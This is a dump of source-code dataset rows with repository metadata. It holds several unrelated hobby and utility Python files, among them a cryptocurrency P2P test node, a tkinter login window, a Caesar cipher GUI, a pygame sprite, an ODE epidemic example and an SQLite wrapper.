b"sendcmpct": msg_sendcmpct,
b"cmpctblock": msg_cmpctblock,
b"getblocktxn": msg_getblocktxn,
b"blocktxn": msg_blocktxn
}
MAGIC_BYTES = {
"mainnet": b"\xf9\xbe\xb4\xd9", # mainnet
"testnet3": b"\x0b\x11\x09\x07", # testnet3
"regtest": b"\xfa\xbf\xb5\xda", # regtest
}
def __init__(self, dstaddr, dstport, rpc, callback, net="regtest", services=NODE_NETWORK, send_version=True):
asyncore.dispatcher.__init__(self, map=mininode_socket_map)
self.log = logging.getLogger("NodeConn(%s:%d)" % (dstaddr, dstport))
self.dstaddr = dstaddr
self.dstport = dstport
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.sendbuf = b""
self.recvbuf = b""
self.ver_send = 209
self.ver_recv = 209
self.last_sent = 0
self.state = "connecting"
self.network = net
self.cb = callback
self.disconnect = False
self.nServices = 0
if send_version:
# stuff version msg into sendbuf
vt = msg_version()
vt.nServices = services
vt.addrTo.ip = self.dstaddr
vt.addrTo.port = self.dstport
vt.addrFrom.ip = "0.0.0.0"
vt.addrFrom.port = 0
self.send_message(vt, True)
print('MiniNode: Connecting to Kreds Node IP # ' + dstaddr + ':' \
+ str(dstport))
try:
self.connect((dstaddr, dstport))
except:
self.handle_close()
self.rpc = rpc
def show_debug_msg(self, msg):
self.log.debug(msg)
def handle_connect(self):
if self.state != "connected":
self.show_debug_msg("MiniNode: Connected & Listening: \n")
self.state = "connected"
self.cb.on_open(self)
def handle_close(self):
self.show_debug_msg("MiniNode: Closing Connection to %s:%d... "
% (self.dstaddr, self.dstport))
self.state = "closed"
self.recvbuf = b""
self.sendbuf = b""
try:
self.close()
except:
pass
self.cb.on_close(self)
def handle_read(self):
try:
t = self.recv(8192)
if len(t) > 0:
self.recvbuf += t
self.got_data()
except:
pass
def readable(self):
return True
def writable(self):
with mininode_lock:
pre_connection = self.state == "connecting"
length = len(self.sendbuf)
return (length > 0 or pre_connection)
def handle_write(self):
with mininode_lock:
# asyncore does not expose socket connection, only the first read/write
# event, thus we must check connection manually here to know when we
# actually connect
if self.state == "connecting":
self.handle_connect()
if not self.writable():
return
try:
sent = self.send(self.sendbuf)
except:
self.handle_close()
return
self.sendbuf = self.sendbuf[sent:]
def got_data(self):
try:
while True:
if len(self.recvbuf) < 4:
return
if self.recvbuf[:4] != self.MAGIC_BYTES[self.network]:
raise ValueError("got garbage %s" % repr(self.recvbuf))
if self.ver_recv < 209:
if len(self.recvbuf) < 4 + 12 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = None
if len(self.recvbuf) < 4 + 12 + 4 + msglen:
return
msg = self.recvbuf[4+12+4:4+12+4+msglen]
self.recvbuf = self.recvbuf[4+12+4+msglen:]
else:
if len(self.recvbuf) < 4 + 12 + 4 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = self.recvbuf[4+12+4:4+12+4+4]
if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
return
msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
th = sha256(msg)
h = sha256(th)
if checksum != h[:4]:
raise ValueError("got bad checksum " + repr(self.recvbuf))
self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
if command in self.messagemap:
f = BytesIO(msg)
t = self.messagemap[command]()
t.deserialize(f)
self.got_message(t)
else:
self.show_debug_msg("Unknown command: '" + command + "' " +
repr(msg))
except Exception as e:
print('got_data:', repr(e))
# import traceback
# traceback.print_tb(sys.exc_info()[2])
def send_message(self, message, pushbuf=False):
if self.state != "connected" and not pushbuf:
raise IOError('Not connected, no pushbuf')
self.show_debug_msg("Send %s" % repr(message))
command = message.command
data = message.serialize()
tmsg = self.MAGIC_BYTES[self.network]
tmsg += command
tmsg += b"\x00" * (12 - len(command))
tmsg += struct.pack("<I", len(data))
if self.ver_send >= 209:
th = sha256(data)
h = sha256(th)
tmsg += h[:4]
tmsg += data
with mininode_lock:
self.sendbuf += tmsg
self.last_sent = time.time()
def got_message(self, message):
if message.command == b"version":
if message.nVersion <= BIP0031_VERSION:
self.messagemap[b'ping'] = msg_ping_prebip31
if self.last_sent + 30 * 60 < time.time():
self.send_message(self.messagemap[b'ping']())
self.show_debug_msg("Recv %s" % repr(message))
self.cb.deliver(self, message)
def disconnect_node(self):
self.disconnect = True
class NetworkThread(Thread):
def run(self):
while mininode_socket_map:
# We check for whether to disconnect outside of the asyncore
# loop to workaround the behavior of asyncore when using
# select
disconnected = []
for fd, obj in mininode_socket_map.items():
if obj.disconnect:
disconnected.append(obj)
[ obj.handle_close() for obj in disconnected ]
asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1)
# An exception we can raise if we detect a potential disconnect
# (p2p or rpc) before the test is complete
class EarlyDisconnectError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| [
"blockartlab@protonmail.com"
] | blockartlab@protonmail.com |
649a84ef287090c60f94004c2eeb3eba7d6ce157 | bb122a6ed6950ad049cef5d4c2885cdb105a9757 | /venv/bin/pip | 4885b9791de0ea049835db968dac4f107e8ed2e0 | [] | no_license | Kreisso/Boston_market_data | 654d0e390ad190222bfca62b6acca86e3b4c5b2c | c34f502412eadc6542589fbed0de6ff1f8a5d20c | refs/heads/master | 2021-09-28T00:12:12.237274 | 2018-11-12T16:42:11 | 2018-11-12T16:42:11 | 157,244,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | #!/Users/kreisso/PycharmProjects/lab2/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"polakmaciej.web@gmail.com"
] | polakmaciej.web@gmail.com | |
3fb99e4416e7ac91d21b8d79e010e34c69830ce0 | d4c9ed6499d71e19db4bfef8562219ad1a3ff0d9 | /gym_log/login_window.py | a701532d7e74d8b2f0a5a20e1def98767d2d4e4f | [] | no_license | neilmarshall/gym-log-gui | 43f5d951e6dfb3ac37f9b4c7fe3a2abfaea90980 | 505272e0a4cafd0cdad751d0213134e890dd5e51 | refs/heads/master | 2022-12-11T10:05:09.187996 | 2022-04-03T19:09:45 | 2022-04-03T19:09:45 | 203,452,899 | 1 | 0 | null | 2022-12-08T06:03:12 | 2019-08-20T20:53:36 | Python | UTF-8 | Python | false | false | 3,892 | py | import os
import re
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
basedir = os.path.split(basedir)[0]
load_dotenv(os.path.join(basedir, '.env'))
class LoginWindow(ttk.Frame):
"""Subclass of tkinter.Frame - controls application login"""
def __init__(self, parent, thread_pool, gym_log_controller):
"""Constructor method"""
super().__init__(parent)
self._thread_pool = thread_pool
self._gym_log_controller = gym_log_controller
self._username_entry = tk.StringVar()
self._password_entry = tk.StringVar()
self._remember_login = tk.IntVar()
def launch(self, successful_login_callback):
"""Build and launch login window"""
self.pack()
# add username and password input widgets
login_widgets = ttk.Frame(self)
login_widgets.pack(padx=10, pady=5)
ttk.Label(login_widgets, text="Username").grid(row=0, column=0)
ttk.Entry(login_widgets, textvariable=self._username_entry).grid(row=0, column=1, columnspan=2)
self._password_entry.set(os.environ.get('DEFAULT_PASSWORD') or '')
ttk.Label(login_widgets, text="Password").grid(row=1, column=0)
ttk.Entry(login_widgets, textvariable=self._password_entry, show='*').grid(row=1, column=1, columnspan=2)
self._username_entry.set(os.environ.get('DEFAULT_USERNAME') or '')
# add login button and 'remember me' functionality
button_widgets = ttk.Frame(self)
button_widgets.pack(padx=10, pady=5)
ttk.Button(button_widgets, text="Login",
command=lambda: self._login(successful_login_callback)) \
.grid(row=2, column=1)
ttk.Checkbutton(button_widgets, text="Remember me", variable=self._remember_login).grid(row=2, column=2)
self._remember_login.set(True)
def _login(self, successful_login_callback):
"""Set a user token on the gym log controller"""
def begin_login():
username, password = self._username_entry.get(), self._password_entry.get()
is_login_successful = self._gym_log_controller.check_token(username, password)
if is_login_successful:
if self._remember_login.get():
self._store_login_details(username, password)
self._gym_log_controller.set_exercises()
return is_login_successful
def end_login(future):
progress_bar.stop()
progress_window.destroy()
if future.result():
self.destroy()
successful_login_callback()
else:
messagebox.showwarning("404 - Unauthorized Access",
"Login attempt failed - please try again")
progress_window = tk.Toplevel(self)
progress_frame = ttk.Frame(progress_window)
progress_frame.pack()
ttk.Label(progress_frame, text="Requesting login token...").pack()
progress_bar = ttk.Progressbar(progress_frame, mode="indeterminate")
progress_bar.pack()
progress_bar.start()
self._thread_pool.submit(begin_login).add_done_callback(end_login)
def _store_login_details(self, username, password):
def keep_setting(setting):
username_match = re.match(r'^\s*DEFAULT_USERNAME=.*$', setting)
password_match = re.match(r'\s*DEFAULT_PASSWORD=.*$', setting)
return setting and not username_match and not password_match
with open('.env') as f:
current_settings = f.read().split('\n')
with open('.env', 'w') as f:
f.write(f'DEFAULT_USERNAME={username}\n')
f.write(f'DEFAULT_PASSWORD={password}\n')
f.writelines('\n'.join(filter(keep_setting, current_settings)))
| [
"neil.marshall@dunelm.org.uk"
] | neil.marshall@dunelm.org.uk |
2df490ce7eb949a7e322c379697be793bc0f5780 | 87e80b44ef471bf5e0a88f005850e09c64f7a8a5 | /cipherGUI.py | 174476ccc37ebb27a4916c4d6f131870cc9bd558 | [] | no_license | KjEndurance/Cipher-GUI | cdb54cc90bf1393c54b233bbabbfc4d671c3ca88 | d47ce517ede0320f29ec369ad176b334f39ece87 | refs/heads/main | 2023-03-02T17:09:48.540461 | 2021-02-13T16:37:21 | 2021-02-13T16:37:21 | 338,615,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,280 | py | import CaesarCipher as cp
from tkinter import Tk, Frame, Label, Text, Button, Menu
class caesarCipherGUI(Frame):
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
self.constructGUI()
def constructGUI(self):
self.parent.title("Encryption Software")
self.parent.geometry("700x700+100+100")
encryptLabel = Label(self.parent, text="Message to Encrypt")
encryptLabel.place(x=10, y=10)
decryptLabel = Label(self.parent, text="Message to Decrypt")
decryptLabel.place(x=570, y=10)
#Encrypt/Decrypt Text Boxes
self.encryptText = Text(self.parent, width=40, height=20, wrap='word')
self.encryptText.place(x=10, y=40)
self.resultText = Text(self.parent, width=40, height=20, wrap='word')
self.resultText.place(x=360, y=40)
#Encrypt/Decrypt Buttons
self.encryptButton = Button(self.parent, text='Encrypt Message', command=self.encryptPressed)
self.encryptButton.place(x=80, y=400)
self.decryptButton = Button(self.parent, text='Decrypt Message', command=self.decryptPressed)
self.decryptButton.place(x=500, y=400)
#Keypad
self.button1 = Button(self.parent, text='1')
self.button1.config(command= lambda: self.numberPressed(self.button1.cget('text')))
self.button1.place(x=325, y=530)
self.button2 = Button(self.parent, text='2')
self.button2.config(command= lambda: self.numberPressed(self.button2.cget('text')))
self.button2.place(x=350, y=530)
self.button3 = Button(self.parent, text='3')
self.button3.config(command= lambda: self.numberPressed(self.button3.cget('text')))
self.button3.place(x=375, y=530)
self.button4 = Button(self.parent, text='4')
self.button4.config(command= lambda: self.numberPressed(self.button4.cget('text')))
self.button4.place(x=325, y=565)
self.button5 = Button(self.parent, text='5')
self.button5.config(command= lambda: self.numberPressed(self.button5.cget('text')))
self.button5.place(x=350, y=565)
self.button6 = Button(self.parent, text='6')
self.button6.config(command= lambda: self.numberPressed(self.button6.cget('text')))
self.button6.place(x=375, y=565)
self.button7 = Button(self.parent, text='7')
self.button7.config(command= lambda: self.numberPressed(self.button7.cget('text')))
self.button7.place(x=325, y=600)
self.button8 = Button(self.parent, text='8')
self.button8.config(command= lambda: self.numberPressed(self.button8.cget('text')))
self.button8.place(x=350, y=600)
self.button9 = Button(self.parent, text='9')
self.button9.config(command= lambda: self.numberPressed(self.button9.cget('text')))
self.button9.place(x=375, y=600)
self.button0 = Button(self.parent, text='0')
self.button0.config(command= lambda: self.numberPressed(self.button0.cget('text')))
self.button0.place(x=350, y=635)
self.numpadBackspace = Button(self.parent, text='<--', command=self.backspacePressed)
self.numpadBackspace.place(x=300, y=635)
self.numpadClear = Button(self.parent, text='CLR', command=self.clearPressed)
self.numpadClear.place(x=380, y=635)
self.numpadDisplay = Text(self.parent, width=12, height=1, state='disabled')
self.numpadDisplay.place(x=310, y=490)
numpadLabel = Label(self.parent, text='Enter key for Encryption and Decryption')
numpadLabel.place(x=260, y=460)
def encryptPressed(self):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) > 0:
message = self.encryptText.get('1.0', 'end-1c')
encrypted = cp.encrypt(message, int(PIN))
self.resultText.delete('1.0', 'end')
self.resultText.insert('1.0', encrypted)
def decryptPressed(self):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) > 0:
message = self.resultText.get('1.0', 'end-1c')
decrypted = cp.decrypt(message, int(PIN))
self.encryptText.delete('1.0', 'end')
self.encryptText.insert('1.0', decrypted)
def numberPressed(self, num):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) < 12:
self.numpadDisplay.config(state='normal')
self.numpadDisplay.insert('end', num)
print(int(num))
self.numpadDisplay.config(state='disabled')
def backspacePressed(self):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) > 0:
self.numpadDisplay.config(state='normal')
self.numpadDisplay.delete('1.0', 'end-1c')
self.numpadDisplay.insert('1.0', PIN[:-1])
self.numpadDisplay.config(state='disabled')
def clearPressed(self):
self.numpadDisplay.config(state='normal')
self.numpadDisplay.delete('1.0', 'end-1c')
self.numpadDisplay.config(state='disabled')
root = Tk()
GUI = caesarCipherGUI(root)
root.mainloop() | [
"root@DESKTOP-BSRUU7S.localdomain"
] | root@DESKTOP-BSRUU7S.localdomain |
6e3d9e6952a135e6cb57aa35e9ce3d3c16d16ec7 | 17abfd2de3370173c043275e21d642beed66c8d2 | /bullet.py | 6e687aeba36c62b6cc4fa8f90b5dc38d5d6039c3 | [] | no_license | NataliTrifonova/Alien_Invasion | 447185d2efd4b91c7c12677321ef3d2c3f113393 | af3676b7e7f4ee2267e11f84388cbe543dbbb858 | refs/heads/master | 2022-02-20T09:44:08.420958 | 2019-10-10T19:03:02 | 2019-10-10T19:03:02 | 214,255,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,310 | py | import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
'''Класс для управления пулями, выпущенными из корабля.'''
def __init__(self, ai_settings, screen, ship):
'''Создает объект пули в текущей позиции корабля.'''
super().__init__()
self.screen = screen
#создание пули в позиции (0,0) и назначение правильной позиции.
self.rect = pygame.Rect(0, 0, ai_settings.bullet_width,
ai_settings.bullet_height)
self.rect.centerx = ship.rect.centerx
self.rect.top = ship.rect.top
#позиция пули хранится в вещественном формате
self.y = float(self.rect.y)
self.color = ai_settings.bullet_color
self.speed_factor = ai_settings.bullet_speed_factor
def update(self):
'''Перемещает пулю вверх по экрану.'''
#обновление позиции пули в вещественном формате.
self.y -= self.speed_factor
#обновление позиции прямоугольника.
self.rect.y = self.y
def draw_bullet(self):
'''Вывод пули на экран.'''
pygame.draw.rect(self.screen, self.color, self.rect)
| [
"natali.trifonova.99@mail.ru"
] | natali.trifonova.99@mail.ru |
78743902ed67eb89cb11381400b6ca5e04e29487 | 72ccb57a10d52fb246d39d0bb94399b39e6c360e | /env/Lib/site-packages/vsts_info_provider/models/vsts_info.py | 9b80e2088e5c720e6bc0046f69b4e0f6921b405d | [] | no_license | malorydodge/SentimentAnalysis | c0ebaf9c8b47c63203c20a1018876c72382497f8 | 2d3d3fc12d1d215f448368c5dd67621002317ddb | refs/heads/master | 2023-05-10T16:37:59.784331 | 2019-09-17T16:26:23 | 2019-09-17T16:26:23 | 209,086,104 | 0 | 1 | null | 2023-05-01T21:15:48 | 2019-09-17T15:08:54 | Dockerfile | UTF-8 | Python | false | false | 1,043 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 1.0.1.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VstsInfo(Model):
"""VstsInfo.
:param server_url:
:type server_url: str
:param collection_info:
:type collection_info: object
:param repository_info:
:type repository_info: object
"""
_attribute_map = {
'server_url': {'key': 'serverUrl', 'type': 'str'},
'collection_info': {'key': 'collection', 'type': 'CollectionInfo'},
'repository_info': {'key': 'repository', 'type': 'RepositoryInfo'},
}
def __init__(self, server_url=None, collection_info=None, repository_info=None):
self.server_url = server_url
self.collection_info = collection_info
self.repository_info = repository_info
| [
"malorydodge@gmail.com"
] | malorydodge@gmail.com |
282f0bd5db6b6d07789e8b6b3f03a2bb8fd906f4 | 1de3ff16f4e114cbbc2b52cef2955ab903ff8744 | /Example/epidemic.py | 0c27d8d4c7010cfd6ada01b62adc303559fed215 | [] | no_license | armoreau/master-thesis | 41ea14c9b52436a818992d5a7b7a425e400e415f | 172651106095dad5bfdc8202e3908a465abb8f1c | refs/heads/master | 2023-05-15T00:34:31.801709 | 2021-06-12T01:40:20 | 2021-06-12T01:40:20 | 304,108,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | import matplotlib.pyplot as plt
#Add parent folder to the path. Code taken from https://codeolives.com/2020/01/10/python-reference-module-in-parent-directory/
import os, sys
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.append(parentdir)
from ode45 import ode45
def ode(t,y,beta,gamma,N) :
return [-beta * y[0] * y[1]/N, beta * y[0] * y[1]/N - gamma * y[1], gamma * y[1]]
tspan = [0, 60]
y0 = [99, 1, 0]
beta = 400/365
gamma = 1/13
N = sum(y0)
argsup = [beta, gamma, N]
sol = ode45(ode, tspan, y0, options = None, varargin = argsup)
#Plot result
fig = plt.figure()
plt.title('Epidemic problem')
plt.xlabel('time [d]')
plt.ylabel('% population')
plt.plot(sol.t,sol.y[0],label="healthy")
plt.plot(sol.t,sol.y[1],label="infected")
plt.plot(sol.t,sol.y[2],label="immune")
plt.legend()
plt.show() | [
"noreply@github.com"
] | armoreau.noreply@github.com |
2626cca9adae3acfe97f8e89c9fba00f989f3c44 | 35697f83f827f96a7e21d3bacbcf60f7ea21dca8 | /setup.py | 21f9dba86a89b9743f2a54439d5b87a58d0a30b7 | [
"Apache-2.0"
] | permissive | benkehoe/aws-arn | 72e43389559e8f2f24cc490c7a99130a09ed759a | 4493f0098155aa7134edc7cd8532ec786c37d6d0 | refs/heads/master | 2021-05-05T08:42:31.604130 | 2018-03-06T19:04:16 | 2018-03-06T19:04:16 | 118,985,009 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | from setuptools import setup
def get_version(name):
import os.path
path = os.path.join(name, '_version')
if not os.path.exists(path):
return "0.0.0"
with open(path) as f:
return f.read().strip()
setup(
name='aws-arn',
version=get_version('aws_arn'),
description='Create properly formatted AWS ARNs according to service rules',
packages=["aws_arn"],
package_data={
"aws_arn": ["config.json", "_version"]
},
entry_points={
'console_scripts': [
'aws-arn = aws_arn:main',
],
},
author='Ben Kehoe',
author_email='bkehoe@irobot.com',
project_urls={
"Source code": "https://github.com/benkehoe/aws-arn",
},
license='Apache Software License 2.0',
classifiers=(
'Development Status :: 2 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: Apache Software License',
),
keywords='aws arn',
) | [
"bkehoe@irobot.com"
] | bkehoe@irobot.com |
8a73ad6df76b9a46ff813a6278b57e82c62c30fb | f760a5900041ec4e8bd8443d62cc8c8f8e1d5575 | /Python/minmax.py | be22372e210778f3d16e2c4dff5cffa516c71600 | [] | no_license | rawskim/gitrepo | b28ef4f1495e45afff8f55bcb097e8f86b9ca249 | 0f687ddb1e5a039647b0d73301316c155f0f8f58 | refs/heads/master | 2021-05-05T09:49:17.385294 | 2019-12-20T06:35:49 | 2019-12-20T06:35:49 | 103,913,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# minmax.py
import random
def losuj(ile, min=0, max=100):
lista=[]
for i in range(ile):
lista.append(random.randint(min, max))
return lista
def minmax(lista):
min = max = lista[0]
lista.pop(0)
for liczba in lista:
if liczba < min:
min = liczba
if liczba > max:
max = liczba
return min, max
def main(args):
lista = losuj(50, 10, 90)
min, max = minmax(lista)
print("Min : {}, Max: {}".format(min, max))
print(lista)
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
| [
"michalrawski01@gmail.com"
] | michalrawski01@gmail.com |
54a075ef2572940304283d2f526de481af678278 | 5154364983b0e44c4af2d41a59cfa8edc923283a | /python_Source/developmentP/deeplearining/pie_chart_01.py | 00eb701184787dad7373c13e41ea294c5459683e | [] | no_license | vasana12/python_python_git | 082f84df30e4b307d223e8970f87a7432a1d80fd | db87e112731fca1fe80fef29d8f180f19b9e7afc | refs/heads/master | 2020-03-30T23:22:30.197307 | 2018-11-24T05:05:51 | 2018-11-24T05:05:51 | 151,698,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 562 | py | import matplotlib.pyplot as plt
from matplotlib import font_manager, rc
import matplotlib
font_location = "C:/Windows/fonts/malgun.ttf"
font_name = font_manager.FontProperties(fname=font_location).get_name()
matplotlib.rc('font', family=font_name)
labels = '개구리', '돼지', '개', '통나무'
sizes = [15, 30, 40, 10]
colors = ['yellowgreen', 'gold', 'lightskyblue', 'lightcoral']
explode = (0, 0.1, 0, 0)
plt.pie(sizes, explode = explode, labels=labels, colors=colors,
autopct='%2.2f%%', shadow=False, startangle=90)
plt.axis('equal')
plt.show() | [
"wodud6349@gmail.com"
] | wodud6349@gmail.com |
8619e1328cd20bbd49f8d3ee9174091af43af082 | 08e1886591fea6ab9dcdc6cedd11a63b9bce4bba | /python/packages/db_table.py | fc7fe6ffc54a96e824289d4b967eb32f4c2a06ac | [] | no_license | liaowen9527/multi_tech | 395bcdb74887196f0eff49e4108a2420a1646e47 | cc5a4541064eeb3d5ec3055d22c1fed3d64fc446 | refs/heads/master | 2023-03-17T20:19:22.544501 | 2022-08-22T03:16:30 | 2022-08-22T03:16:30 | 154,770,399 | 0 | 0 | null | 2023-03-03T19:00:18 | 2018-10-26T03:11:59 | C++ | UTF-8 | Python | false | false | 3,454 | py | import sqlite3
from packages.nb_datetime import *
class NbDBFeled:
def __init__(self):
self.is_pk = False
self.not_null = False
self.name = ''
self.type = ''
class NbDBTable:
def __init__(self, name = ''):
self.dbpath = ''
self.name = name
self.fields = []
self.conn = None
def create_table(self):
conn = sqlite3.connect(self.dbpath)
c = conn.cursor()
fields = []
for f in self.fields:
ex = ''
if f.is_pk:
ex = ' PRIMARY KEY NOT NULL'
elif f.not_null:
ex = ' NOT NULL'
fields.append(str('%s %s%s' % (f.name, f.type, ex)))
sql = str('CREATE TABLE IF NOT EXISTS %s (%s);' % (self.name, ','.join(fields)))
c.execute(sql)
self.conn = conn
def set_pk_field(self, field):
f = self.get_field(field)
if f is not None:
f.is_pk = True
return
f = NbDBFeled()
f.name = field
f.is_pk = True
self.fields.append(f)
def get_field(self, field):
for f in self.fields:
if f.name == field:
return f
return None
def init_fields_by_dict(self, dict_):
for k, v in dict_.items():
if self.get_field(k) is not None:
continue
field = NbDBFeled()
field.name = k
if isinstance(v, int):
field.type = 'INTEGER'
elif isinstance(v, float):
field.type = 'NUMERIC'
else:
field.type = 'TEXT'
self.fields.append(field)
def get_conn(self):
if self.conn is None:
self.create_table()
return self.conn
def insert(self, dict_, commit=True):
conn = self.get_conn()
c = conn.cursor()
self.insert_c(dict_, c)
conn.commit()
def insert_many(self, arr):
conn = self.get_conn()
c = conn.cursor()
for dict_ in arr:
self.insert_c(dict_, c)
conn.commit()
def insert_c(self, dict_, cursor):
arr_f = []
arr_v = []
for k, v in dict_.items():
arr_f.append(k)
if isinstance(v, datetime.datetime):
arr_v.append(nb_datetime.to_ms_string(v))
else:
arr_v.append(v)
continue
if isinstance(v, int) or isinstance(v, float):
arr_v.append(str(v))
else:
temp = str(v).replace('"', '""')
arr_v.append(str('"%s"' % str(v)))
arr_o = ['?' for i in range(len(arr_f))]
sql = str('INSERT INTO %s(%s) VALUES(%s)' % (self.name, ','.join(arr_f), ','.join(arr_o)) )
cursor.execute(sql, arr_v)
def update(self, obj):
pass
def update_many(self, arr):
pass
def upset(self, obj):
pass
def upset_many(self, arr):
pass
def delete(self):
pass
def delete_many(self):
pass
if __name__ == "__main__":
table = NbDBTable()
table.name = 'aaa'
table.dbpath = r"E:\\git_code\\ng-support\\ng\\Tool\\NBSupport\\package\\data\\aa.db"
table.set_pk_field('_id')
dict_ = {'_id':'aaa', 'name':'liaowen', 'num': 3}
table.init_fields_by_dict(dict_)
table.insert(dict_) | [
"wen.liao@netbrain.com"
] | wen.liao@netbrain.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.